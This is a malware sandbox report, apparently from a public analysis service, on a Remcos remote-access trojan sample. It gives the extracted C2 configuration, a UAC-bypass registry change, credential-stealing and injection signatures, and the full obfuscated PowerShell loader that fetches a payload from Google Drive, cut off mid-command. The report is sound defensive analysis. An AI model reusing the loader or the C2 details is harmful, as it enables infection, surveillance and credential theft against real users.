remcos | 27ab626711706fe4699ec17a7d7e0cd6aa2181ac87d7693cf55ef728242d4181

Analysis

max time kernel
149s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
20-11-2024 15:58

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

LSMUCITATALT20-11-2024pdf.vbe
Size

11KB
MD5

df045c185b46e8c2432ea266b0671f86
SHA1

db27134d7be95240a1349bbcd1a1dcfa0dfb3506
SHA256

27ab626711706fe4699ec17a7d7e0cd6aa2181ac87d7693cf55ef728242d4181
SHA512

99306cbf23bf7a00a398849ca8ff25ce9ab1659f686e28e3e843b1a1632637495c177044173e70ad58571e2d856f4aa4e4b22b2e48e9a8cc3944feabeb4e11ae
SSDEEP

192:1P3nxwOrFEWWm60w5HPZMy35kCktIFc/T+zxLQkQUYUu59ynvT/1dut4VXcz1Xzy:9pJEWM08HRdyCHFsaFQkQUYhivZktOMc

Score

10^/10

remcos remotehost collection credential_access discovery evasion rat stealer trojan

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

gnsuw4-nsh6-mnsg.duckdns.org:3613

Attributes

audio_folder
MicRecords
audio_path
ApplicationPath
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
true
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-8OIXMO
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Remcos family
remcos
UAC bypass 3 TTPs 1 IoCs
evasion trojan

Bypass User Account Control
T1548.002

Disable or Modify Tools
T1562.001

Modify Registry
T1112

Processes:

reg.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Detected Nirsoft tools 3 IoCs

Free utilities often used by attackers which can steal passwords, product keys, etc.

Processes:

resource	yara_rule
behavioral2/memory/1672-83-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft
behavioral2/memory/1360-89-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft
behavioral2/memory/4800-82-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft

NirSoft MailPassView 1 IoCs

Password recovery tool for various email clients

Processes:

resource	yara_rule
behavioral2/memory/4800-82-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView

NirSoft WebBrowserPassView 1 IoCs

Password recovery tool for various web browsers

Processes:

resource	yara_rule
behavioral2/memory/1672-83-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView

Blocklisted process makes network request 12 IoCs

Processes:

powershell.exemsiexec.exe

flow	pid	process
7	2012	powershell.exe
12	2012	powershell.exe
26	2060	msiexec.exe
28	2060	msiexec.exe
30	2060	msiexec.exe
32	2060	msiexec.exe
34	2060	msiexec.exe
42	2060	msiexec.exe
47	2060	msiexec.exe
48	2060	msiexec.exe
49	2060	msiexec.exe
52	2060	msiexec.exe

Uses browser remote debugging 2 TTPs 9 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
credential_access stealer

Steal Web Session Cookie
T1539

Modify Authentication Process
T1556

Processes:

msedge.exemsedge.exeChrome.exeChrome.exeChrome.exemsedge.exeChrome.exemsedge.exemsedge.exe

pid process

3916 msedge.exe
3696 msedge.exe
4736 Chrome.exe
4480 Chrome.exe
212 Chrome.exe
1588 msedge.exe
3824 Chrome.exe
3288 msedge.exe
752 msedge.exe
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

WScript.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation WScript.exe

pid	process
3916	msedge.exe
3696	msedge.exe
4736	Chrome.exe
4480	Chrome.exe
212	Chrome.exe
1588	msedge.exe
3824	Chrome.exe
3288	msedge.exe
752	msedge.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	WScript.exe

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

Processes:

msiexec.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	msiexec.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service
T1102

Processes:

flow ioc

5 drive.google.com
7 drive.google.com
26 drive.google.com
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

Processes:

msiexec.exe

pid process

2060 msiexec.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

powershell.exemsiexec.exe

pid process

4052 powershell.exe
2060 msiexec.exe

flow	ioc
5	drive.google.com
7	drive.google.com
26	drive.google.com

pid	process
2060	msiexec.exe

pid	process
4052	powershell.exe
2060	msiexec.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

msiexec.exe

description	pid	process	target process
PID 2060 set thread context of 1672	2060	msiexec.exe	msiexec.exe
PID 2060 set thread context of 4800	2060	msiexec.exe	msiexec.exe
PID 2060 set thread context of 1360	2060	msiexec.exe	msiexec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

reg.exemsiexec.exemsiexec.exemsiexec.exepowershell.exemsiexec.execmd.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exeChrome.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	Chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe

Modifies registry class 1 IoCs

Processes:

msedge.exe

description ioc process

Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ msedge.exe
Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

4716 reg.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe

pid	process
4716	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exemsiexec.exemsiexec.exemsiexec.exeChrome.exe

pid	process
2012	powershell.exe
2012	powershell.exe
4052	powershell.exe
4052	powershell.exe
4052	powershell.exe
2060	msiexec.exe
2060	msiexec.exe
2060	msiexec.exe
2060	msiexec.exe
2060	msiexec.exe
2060	msiexec.exe
2060	msiexec.exe
2060	msiexec.exe
1672	msiexec.exe
1672	msiexec.exe
2060	msiexec.exe
2060	msiexec.exe
2060	msiexec.exe
2060	msiexec.exe
1360	msiexec.exe
1360	msiexec.exe
2060	msiexec.exe
2060	msiexec.exe
2060	msiexec.exe
2060	msiexec.exe
2060	msiexec.exe
2060	msiexec.exe
2060	msiexec.exe
2060	msiexec.exe
2060	msiexec.exe
2060	msiexec.exe
2060	msiexec.exe
2060	msiexec.exe
2060	msiexec.exe
2060	msiexec.exe
1672	msiexec.exe
1672	msiexec.exe
2060	msiexec.exe
2060	msiexec.exe
2060	msiexec.exe
2060	msiexec.exe
2060	msiexec.exe
2060	msiexec.exe
4736	Chrome.exe
4736	Chrome.exe
2060	msiexec.exe
2060	msiexec.exe
2060	msiexec.exe
2060	msiexec.exe
2060	msiexec.exe
2060	msiexec.exe
2060	msiexec.exe
2060	msiexec.exe
2060	msiexec.exe
2060	msiexec.exe
2060	msiexec.exe
2060	msiexec.exe
2060	msiexec.exe
2060	msiexec.exe
2060	msiexec.exe
2060	msiexec.exe
2060	msiexec.exe
2060	msiexec.exe
2060	msiexec.exe

Suspicious behavior: MapViewOfSection 6 IoCs

Processes:

powershell.exemsiexec.exe

pid process

4052 powershell.exe
2060 msiexec.exe
2060 msiexec.exe
2060 msiexec.exe
2060 msiexec.exe
2060 msiexec.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs

Processes:

msedge.exe

pid process

3288 msedge.exe
3288 msedge.exe
3288 msedge.exe
3288 msedge.exe

pid	process
4052	powershell.exe
2060	msiexec.exe
2060	msiexec.exe
2060	msiexec.exe
2060	msiexec.exe
2060	msiexec.exe

pid	process
3288	msedge.exe
3288	msedge.exe
3288	msedge.exe
3288	msedge.exe

Suspicious use of AdjustPrivilegeToken 21 IoCs

Processes:

powershell.exepowershell.exemsiexec.exeChrome.exe

description	pid	process
Token: SeDebugPrivilege	2012	powershell.exe
Token: SeDebugPrivilege	4052	powershell.exe
Token: SeDebugPrivilege	1360	msiexec.exe
Token: SeShutdownPrivilege	4736	Chrome.exe
Token: SeCreatePagefilePrivilege	4736	Chrome.exe
Token: SeShutdownPrivilege	4736	Chrome.exe
Token: SeCreatePagefilePrivilege	4736	Chrome.exe
Token: SeShutdownPrivilege	4736	Chrome.exe
Token: SeCreatePagefilePrivilege	4736	Chrome.exe
Token: SeShutdownPrivilege	4736	Chrome.exe
Token: SeCreatePagefilePrivilege	4736	Chrome.exe
Token: SeShutdownPrivilege	4736	Chrome.exe
Token: SeCreatePagefilePrivilege	4736	Chrome.exe
Token: SeShutdownPrivilege	4736	Chrome.exe
Token: SeCreatePagefilePrivilege	4736	Chrome.exe
Token: SeShutdownPrivilege	4736	Chrome.exe
Token: SeCreatePagefilePrivilege	4736	Chrome.exe
Token: SeShutdownPrivilege	4736	Chrome.exe
Token: SeCreatePagefilePrivilege	4736	Chrome.exe
Token: SeShutdownPrivilege	4736	Chrome.exe
Token: SeCreatePagefilePrivilege	4736	Chrome.exe

Suspicious use of FindShellTrayWindow 3 IoCs

Processes:

Chrome.exemsedge.exe

pid process

4736 Chrome.exe
3288 msedge.exe
3288 msedge.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

msiexec.exe

pid process

2060 msiexec.exe

pid	process
4736	Chrome.exe
3288	msedge.exe
3288	msedge.exe

pid	process
2060	msiexec.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

WScript.exepowershell.exemsiexec.execmd.exeChrome.exe

description	pid	process	target process
PID 3096 wrote to memory of 2012	3096	WScript.exe	powershell.exe
PID 3096 wrote to memory of 2012	3096	WScript.exe	powershell.exe
PID 4052 wrote to memory of 2060	4052	powershell.exe	msiexec.exe
PID 4052 wrote to memory of 2060	4052	powershell.exe	msiexec.exe
PID 4052 wrote to memory of 2060	4052	powershell.exe	msiexec.exe
PID 4052 wrote to memory of 2060	4052	powershell.exe	msiexec.exe
PID 2060 wrote to memory of 4356	2060	msiexec.exe	cmd.exe
PID 2060 wrote to memory of 4356	2060	msiexec.exe	cmd.exe
PID 2060 wrote to memory of 4356	2060	msiexec.exe	cmd.exe
PID 4356 wrote to memory of 4716	4356	cmd.exe	reg.exe
PID 4356 wrote to memory of 4716	4356	cmd.exe	reg.exe
PID 4356 wrote to memory of 4716	4356	cmd.exe	reg.exe
PID 2060 wrote to memory of 4736	2060	msiexec.exe	Chrome.exe
PID 2060 wrote to memory of 4736	2060	msiexec.exe	Chrome.exe
PID 4736 wrote to memory of 4448	4736	Chrome.exe	Chrome.exe
PID 4736 wrote to memory of 4448	4736	Chrome.exe	Chrome.exe
PID 2060 wrote to memory of 2044	2060	msiexec.exe	msiexec.exe
PID 2060 wrote to memory of 2044	2060	msiexec.exe	msiexec.exe
PID 2060 wrote to memory of 2044	2060	msiexec.exe	msiexec.exe
PID 2060 wrote to memory of 1672	2060	msiexec.exe	msiexec.exe
PID 2060 wrote to memory of 1672	2060	msiexec.exe	msiexec.exe
PID 2060 wrote to memory of 1672	2060	msiexec.exe	msiexec.exe
PID 2060 wrote to memory of 1672	2060	msiexec.exe	msiexec.exe
PID 2060 wrote to memory of 4800	2060	msiexec.exe	msiexec.exe
PID 2060 wrote to memory of 4800	2060	msiexec.exe	msiexec.exe
PID 2060 wrote to memory of 4800	2060	msiexec.exe	msiexec.exe
PID 2060 wrote to memory of 4800	2060	msiexec.exe	msiexec.exe
PID 2060 wrote to memory of 3656	2060	msiexec.exe	msiexec.exe
PID 2060 wrote to memory of 3656	2060	msiexec.exe	msiexec.exe
PID 2060 wrote to memory of 3656	2060	msiexec.exe	msiexec.exe
PID 2060 wrote to memory of 1360	2060	msiexec.exe	msiexec.exe
PID 2060 wrote to memory of 1360	2060	msiexec.exe	msiexec.exe
PID 2060 wrote to memory of 1360	2060	msiexec.exe	msiexec.exe
PID 2060 wrote to memory of 1360	2060	msiexec.exe	msiexec.exe
PID 4736 wrote to memory of 2264	4736	Chrome.exe	Chrome.exe
PID 4736 wrote to memory of 2264	4736	Chrome.exe	Chrome.exe
PID 4736 wrote to memory of 2264	4736	Chrome.exe	Chrome.exe
PID 4736 wrote to memory of 2264	4736	Chrome.exe	Chrome.exe
PID 4736 wrote to memory of 2264	4736	Chrome.exe	Chrome.exe
PID 4736 wrote to memory of 2264	4736	Chrome.exe	Chrome.exe
PID 4736 wrote to memory of 2264	4736	Chrome.exe	Chrome.exe
PID 4736 wrote to memory of 2264	4736	Chrome.exe	Chrome.exe
PID 4736 wrote to memory of 2264	4736	Chrome.exe	Chrome.exe
PID 4736 wrote to memory of 2264	4736	Chrome.exe	Chrome.exe
PID 4736 wrote to memory of 2264	4736	Chrome.exe	Chrome.exe
PID 4736 wrote to memory of 2264	4736	Chrome.exe	Chrome.exe
PID 4736 wrote to memory of 2264	4736	Chrome.exe	Chrome.exe
PID 4736 wrote to memory of 2264	4736	Chrome.exe	Chrome.exe
PID 4736 wrote to memory of 2264	4736	Chrome.exe	Chrome.exe
PID 4736 wrote to memory of 2264	4736	Chrome.exe	Chrome.exe
PID 4736 wrote to memory of 2264	4736	Chrome.exe	Chrome.exe
PID 4736 wrote to memory of 2264	4736	Chrome.exe	Chrome.exe
PID 4736 wrote to memory of 2264	4736	Chrome.exe	Chrome.exe
PID 4736 wrote to memory of 2264	4736	Chrome.exe	Chrome.exe
PID 4736 wrote to memory of 2264	4736	Chrome.exe	Chrome.exe
PID 4736 wrote to memory of 2264	4736	Chrome.exe	Chrome.exe
PID 4736 wrote to memory of 2264	4736	Chrome.exe	Chrome.exe
PID 4736 wrote to memory of 2264	4736	Chrome.exe	Chrome.exe
PID 4736 wrote to memory of 2264	4736	Chrome.exe	Chrome.exe
PID 4736 wrote to memory of 2264	4736	Chrome.exe	Chrome.exe
PID 4736 wrote to memory of 2264	4736	Chrome.exe	Chrome.exe
PID 4736 wrote to memory of 2264	4736	Chrome.exe	Chrome.exe
PID 4736 wrote to memory of 2264	4736	Chrome.exe	Chrome.exe
PID 4736 wrote to memory of 2264	4736	Chrome.exe	Chrome.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\LSMUCITATALT20-11-2024pdf.vbe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3096
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Subnutritious Uninstructedness snigvejen Sortilegi #><#Diectasis Rodfunktioner Brdristens Sangerne #>$Bortfaldenes='Obskniteters';function Allemandes($Erhvervsgeografien){If ($host.DebuggerEnabled) {$nickelodeons=4} for ($Thimotheuss=$nickelodeons;;$Thimotheuss+=5){if(!$Erhvervsgeografien[$Thimotheuss]) { break }$Adgangskortenes55+=$Erhvervsgeografien[$Thimotheuss]}$Adgangskortenes55}function Xylotomies207($Sablende){ .($Douser) ($Sablende)}$Samandura=Allemandes 'BeteN TjeE inttRace. DelWSteneJustb FutCBacklTheoIRensEKagenRecat';$Trolls=Allemandes 'KonsMDrivo lluzHvlbipicklReprl J.naTold/';$Tereu=Allemandes 'NonaTGo.ilBegosEpid1 Opk2';$Tapeline=' Kat[ GuendelmeProit pro. UkoSAnakeMon.r.eacvla,gI R.fC SumeCorypCromo erIKjo nTopftSicum umoaForsN oraSoftgAeaceAffiRSpy ]endi:Liga: ,veSRevleYeascMareUBundrSvrniRoulTTi byin oP w nRLumboLaocT Foro zencToplOc rvLBars= Fer$OvartdiveE ReirB neEDen U';$Trolls+=Allemandes ' Tub5Firb.Sing0Rger Ngle(E,shWSel iBrs.n Li,dAfproGraywWronsOpsv H,ksN.ranTB dm Tyr 1Afko0Nonf.Unsp0Char; Kab nkuWB skiThu nLose6U su4Elec;svin Theox nom6Alge4,ice;U,ve n.nrKa.evAwfu:Spur1E.vi3H pe1F sh.Metr0 Enc)afna BegaG Greeel zcPrenkGrapoDekl/Mine2Aris0Semi1.ini0tvan0 Ano1Fr n0 Sol1alb, inF einiGrnsrSlove,verfPr voImbrxVisu/,ide1Alla3F,is1 He .,rem0';$Floristernes=Allemandes ' BreUPulssGuide PasrEnso-jestA Br GCus ENo tnMrkeT';$Infinitively=Allemandes 'NonmhArmvtBekrtSpanp uersWa e:Akry/Soc./ vrdd otr .uciTranv SereStag.SatrgHjeroableoCensg LaplExcieinte.vandcPoetoSu fm Ska/H teupr mc rk?Overe enxDecapruntoMararbro tKnob=tabudSe ioPropwOstenBar.llustoRivea Re dOrga& Geni haedDith=.lot1 rekzheadiMeloYStkyxC unCKummjDe.kUDescv.egij No.9Acra9TranQEna tVa.mXKolaQiracjPostBPianjTereAFacex BihM B osRegne AdemU saosysi3CondELondXBill9adonDvapu8Stanj';$Chroococcoid=Allemandes 'Malp>';$Douser=Allemandes 'GirgILrebEPegbx';$Jakey='Risting';$Undepreciatory='\Malodourously.dar';Xylotomies207 (Allemandes 'Glue$BeclgAfbll TesoVrisb InqA lazlNomi:AtroB.eetrI quI .ubsthinKffes=Feb,$Jus eElixNWoohVSvam:OppuA UnppRan pNo,mdHa vA Ma t s nAAnti+Af.a$LedeuS erNN veDDokuEAtomP BanrV,teEDadacHjruI AnbA,hilt nnooDoseRRe lY');Xylotomies207 (Allemandes 'Abat$AdelGM isLSuppo TarBFag,aC smL .es:HusmoNoduM Ti sIu iaaarst BistCannECell=E.en$ GavICallnOverfSkumIOverNLapiIUdb,tR ndisabbvweire An.lMissYKobl. U ssSlipPPa,iLRastI S mT ice( S,o$ egicDa kHGasmrUnsioOp,uORe,lC TurO.patcCoadCKar.o BorI ,ukDlde )');Xylotomies207 (Allemandes $Tapeline);$Infinitively=$Omsatte[0];$Unpositively=(Allemandes ' Del$Eu,aGU koLVa eONiccb Kn AHiplLB yg:HaarwSupeiT.mmECathNSl eERetiRNumibA teRTanddKompsCavasqua TD,loNReprG PlueLysnrcandNJrg e Gei=ImpeNDu dEtit WS en-RaadoVanrb Lo jOmdmEV ndCBrieT ykn Tecssel YRg.osfalsT BonEDe,lM Afs.Auke$UnchSPoliATorfM tudASandNPam D Flau FelRLaurA');Xylotomies207 ($Unpositively);Xylotomies207 (Allemandes ' T,e$BoucW periTelle m.gnOvere Albr VokbNab,r PyrdBri,sR.sssDi,ctglasn Parg FloeDelgrIntenSigteAand.Rec,H FoneAbigaKagedForteDebarl onsalte[Arch$MisdF E,tl PodoCa.hr F uiDfrnsLa gtI aqeSva r,nddnUndeeRainsK.ss]Bu.e=Selv$ eadT .ocrRea oUrinlSp il .urs');$Udfladnings=Allemandes 'Poly$ A,aW Pa iSvireBenenJeereQuinrSharbOpisr TildCigasAm asVaretDeprnBeswgAb resikkr Lemn LauePhia.mi,iDfermotek.wT ken Huml orao LivaPresdSorbFHystiUdvelk tee for(Spid$O ivI LiznNonsfSolii UndnStifiSautt RosiBesvvRadreS yrlKonfyReve,Uno.$DgnaARubrnLa dd HoceNua nJennpBurmrD,sim U oiProte amps nww)';$Andenprmies=$Brisk;Xylotomies207 (Allemandes 'Un.i$ de GTubol ltroDeacbAll aNiobLEpit: C rKUti,l.aadOses VThilnBrugNZym UOpglm etrM CroEWin R Mus= sa.(Ne tTT nkEOmgjSHestTOutt-Tro,PextraudslTSkriHFlit N,ds$Essea UraNStudDTimbe MesNGhosPHei,rBalkM,onpIAmmeESkjoSUniv)');while (!$Klovnnummer) {Xylotomies207 (Allemandes 'Borg$.urrgHum lpuncoGe ebOvera Eb,lHead:Par,C PeroShamxJordc ArioUg.lmBrusb,efor.hapiCyaneKry s aan=c as$M,leBTyp o ErlsPhr tEn,etA,jee R,ar') ;Xylotomies207 $Udfladnings;Xylotomies207 (Allemandes 'PsycsNonet RepAPerorSeptTf,el-NedfSDizelBeneeLoneePetrPTwea Bri 4');Xylotomies207 (Allemandes ' Rib$C isgUnd.L BlrOd.febTsadaVitaL Ra.:EmbrkSekulRombO ensvChicNdeponMiddu.verm He m NauEKa pRWarn=skra(p peT eskEFruss TriTH rm- mazpMisuA U sTConthRepr b.n$FagoaRecoNUnf dBredE ygenPivopIm.rRBa emUnbeIBereeD,masUd,r)') ;Xylotomies207 (Allemandes ' Fl,$Dilag Gral coOYohibTa laOutplRipo: Ca SwoulPF ruROdden EngG,funHT ykoSkewv nkeeKommd Fl eEpidrDecon.rteech rsUrmi=prel$reapgArbeLNonsO K obMissAHjemL Ndv:Dolio otiFk,gefBankSOvercIr.eRFor EBogseBambNP ri+ Flu+ Jus%Mack$NienoForuMGyngSCeduALkkeTTermtAnmeeinsp. Pr C CysO T pUG arnMokkT') ;$Infinitively=$Omsatte[$Sprnghovedernes]}$Thimotheussndsamles=315155;$Desmolase=29732;Xylotomies207 (Allemandes 'Prom$VgtiGAistLIn.eoTinhbraisAUdsklAl e: Fu sRecuLCarcEDre UhomotTessHB stHStruO La UObarN forD Pri Ac e=Demi TilgtraweMil T Jde-Col cRik o patN Ly,t.rllEForrngadoTSt,l Unad$ SmaamarinDys,dSubeERibeNVagtpWom RTvanML,erIApanEArsmS');Xylotomies207 (Allemandes '.etr$ alig AselPlumoV sabLemmaFeudllogo: Un FUnpaodaddr Dele eoigUnhug.oillRestiAf lnKloogBegreKonfnOmv sM.re Nic=Graf O t[ CruSMusiyTrubsDisrtSymbeSolbmExci.OverCAreooBul nConsvBegie tavrAnkot ind]Komp: Hea:GlaiFSayerdimhoHogrm emiBInflaFlu s fore Sam6Spru4 An,SratitTremrFortiBerenJackgD,sl(Ta u$MollSRazzl.ilje Hylu Re t FrshMarehSalboUdflu Monnear,dAfsk)');Xylotomies207 (Allemandes 'Sk n$HoldgAccrLur eO Synbma ta VanL Ti,: onUSt nNefteSPol e Fl CGa srspriEOverTDispE resDBy,n Tra=S ri Hnde[VeinSSnegYMuffS Pe TDiseeSen MP ot.Ov,rtSti E AflXHom T s,r.Reb e,ysiN RotcK,mpORebaDVoldi Fo.NImplgPelo]J.rd:T et:ImdeaBeaaSRubecLan iBarfiBab,. islG uneETi nT,oreSMundTBai RIn eiPo,eNRe lGTele(Attr$blanfMis oHatcRTaoieBlyrGSim,GOve l ,eaiEnednSugngR voENonsNAshiSRequ)');Xylotomies207 (Allemandes ' Spi$f lsG ,mplUn ooTropBHalvAKalkLOlie:FusuEZilcU punrOverOOmklp PvtAAfhnmSvibEEnlaSNysgTVo.aEPascRSixpe Pren CocsCons=Land$ Appu losNGrafSnybeeSpi.c SpdRFrste Rolt bacEH mmdMeth. F,rs RenuBlodBSep SBarnTB nirKoleiParanBa dGDark(Iden$SubfTCrumhpleuIPlanMSaddOK.nsTfla.HGasteMetauR soSActaSMininS roD RetS SnkABodsmT.kslinteEUnd SEu,r,dolo$ObliD UfoeVagtsSly mxeraoDeneL Amia Acas rseeReor)');Xylotomies207 $Europamesterens;"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2012

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Subnutritious Uninstructedness snigvejen Sortilegi #><#Diectasis Rodfunktioner Brdristens Sangerne #>$Bortfaldenes='Obskniteters';function Allemandes($Erhvervsgeografien){If ($host.DebuggerEnabled) {$nickelodeons=4} for ($Thimotheuss=$nickelodeons;;$Thimotheuss+=5){if(!$Erhvervsgeografien[$Thimotheuss]) { break }$Adgangskortenes55+=$Erhvervsgeografien[$Thimotheuss]}$Adgangskortenes55}function Xylotomies207($Sablende){ .($Douser) ($Sablende)}$Samandura=Allemandes 'BeteN TjeE inttRace. DelWSteneJustb FutCBacklTheoIRensEKagenRecat';$Trolls=Allemandes 'KonsMDrivo lluzHvlbipicklReprl J.naTold/';$Tereu=Allemandes 'NonaTGo.ilBegosEpid1 Opk2';$Tapeline=' Kat[ GuendelmeProit pro. UkoSAnakeMon.r.eacvla,gI R.fC SumeCorypCromo erIKjo nTopftSicum umoaForsN oraSoftgAeaceAffiRSpy ]endi:Liga: ,veSRevleYeascMareUBundrSvrniRoulTTi byin oP w nRLumboLaocT Foro zencToplOc rvLBars= Fer$OvartdiveE ReirB neEDen U';$Trolls+=Allemandes ' Tub5Firb.Sing0Rger Ngle(E,shWSel iBrs.n Li,dAfproGraywWronsOpsv H,ksN.ranTB dm Tyr 1Afko0Nonf.Unsp0Char; Kab nkuWB skiThu nLose6U su4Elec;svin Theox nom6Alge4,ice;U,ve n.nrKa.evAwfu:Spur1E.vi3H pe1F sh.Metr0 Enc)afna BegaG Greeel zcPrenkGrapoDekl/Mine2Aris0Semi1.ini0tvan0 Ano1Fr n0 Sol1alb, inF einiGrnsrSlove,verfPr voImbrxVisu/,ide1Alla3F,is1 He .,rem0';$Floristernes=Allemandes ' BreUPulssGuide PasrEnso-jestA Br GCus ENo tnMrkeT';$Infinitively=Allemandes 'NonmhArmvtBekrtSpanp uersWa e:Akry/Soc./ vrdd otr .uciTranv SereStag.SatrgHjeroableoCensg LaplExcieinte.vandcPoetoSu fm Ska/H teupr mc rk?Overe enxDecapruntoMararbro tKnob=tabudSe ioPropwOstenBar.llustoRivea Re dOrga& Geni haedDith=.lot1 rekzheadiMeloYStkyxC unCKummjDe.kUDescv.egij No.9Acra9TranQEna tVa.mXKolaQiracjPostBPianjTereAFacex BihM B osRegne AdemU saosysi3CondELondXBill9adonDvapu8Stanj';$Chroococcoid=Allemandes 'Malp>';$Douser=Allemandes 'GirgILrebEPegbx';$Jakey='Risting';$Undepreciatory='\Malodourously.dar';Xylotomies207 (Allemandes 'Glue$BeclgAfbll TesoVrisb InqA lazlNomi:AtroB.eetrI quI .ubsthinKffes=Feb,$Jus eElixNWoohVSvam:OppuA UnppRan pNo,mdHa vA Ma t s nAAnti+Af.a$LedeuS erNN veDDokuEAtomP BanrV,teEDadacHjruI AnbA,hilt nnooDoseRRe lY');Xylotomies207 (Allemandes 'Abat$AdelGM isLSuppo TarBFag,aC smL .es:HusmoNoduM Ti sIu iaaarst BistCannECell=E.en$ GavICallnOverfSkumIOverNLapiIUdb,tR ndisabbvweire An.lMissYKobl. U ssSlipPPa,iLRastI S mT ice( S,o$ egicDa kHGasmrUnsioOp,uORe,lC TurO.patcCoadCKar.o BorI ,ukDlde )');Xylotomies207 (Allemandes $Tapeline);$Infinitively=$Omsatte[0];$Unpositively=(Allemandes ' Del$Eu,aGU koLVa eONiccb Kn AHiplLB yg:HaarwSupeiT.mmECathNSl eERetiRNumibA teRTanddKompsCavasqua TD,loNReprG PlueLysnrcandNJrg e Gei=ImpeNDu dEtit WS en-RaadoVanrb Lo jOmdmEV ndCBrieT ykn Tecssel YRg.osfalsT BonEDe,lM Afs.Auke$UnchSPoliATorfM tudASandNPam D Flau FelRLaurA');Xylotomies207 ($Unpositively);Xylotomies207 (Allemandes ' T,e$BoucW periTelle m.gnOvere Albr VokbNab,r PyrdBri,sR.sssDi,ctglasn Parg FloeDelgrIntenSigteAand.Rec,H FoneAbigaKagedForteDebarl onsalte[Arch$MisdF E,tl PodoCa.hr F uiDfrnsLa gtI aqeSva r,nddnUndeeRainsK.ss]Bu.e=Selv$ eadT .ocrRea oUrinlSp il .urs');$Udfladnings=Allemandes 